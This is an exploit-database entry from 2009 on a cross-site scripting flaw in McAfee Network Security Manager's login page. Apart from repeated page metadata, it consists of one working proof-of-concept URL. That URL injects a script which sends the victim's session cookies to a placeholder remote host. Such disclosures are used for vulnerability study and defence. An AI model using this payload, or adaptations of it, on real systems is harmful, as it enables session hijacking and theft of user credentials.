McAfee Network Security Manager < 5.1.11.8.1 - Information Disclosure
| EKU-ID: 17724 | CVE: | OSVDB-ID: |
| Author: Daniel King | Published: 2009-11-12 | Verified:
 |
| Download: | ||
Rating☆☆☆☆☆ |
| EKU-ID: 17724 | CVE: | OSVDB-ID: |
| Author: Daniel King | Published: 2009-11-12 | Verified:
|
| Download: | ||
Rating☆☆☆☆☆ |
To exploit this issue, an attacker must entice an unsuspecting user to view a malicious webpage. The following proof of concept uses a cross-site scripting attack to leverage this issue: https://www.example.com/intruvert/jsp/module/Login.jsp?password=&Login%2bID=&node=&iaction=precreatefcb1 4%22%3E%3Cscript%3Enew%20Image().src=%22http://x.x.x.x/mcafee/log.cgi?c=%22%2BencodeURI(document.cookie);%3C/script%3E8b3283a1e57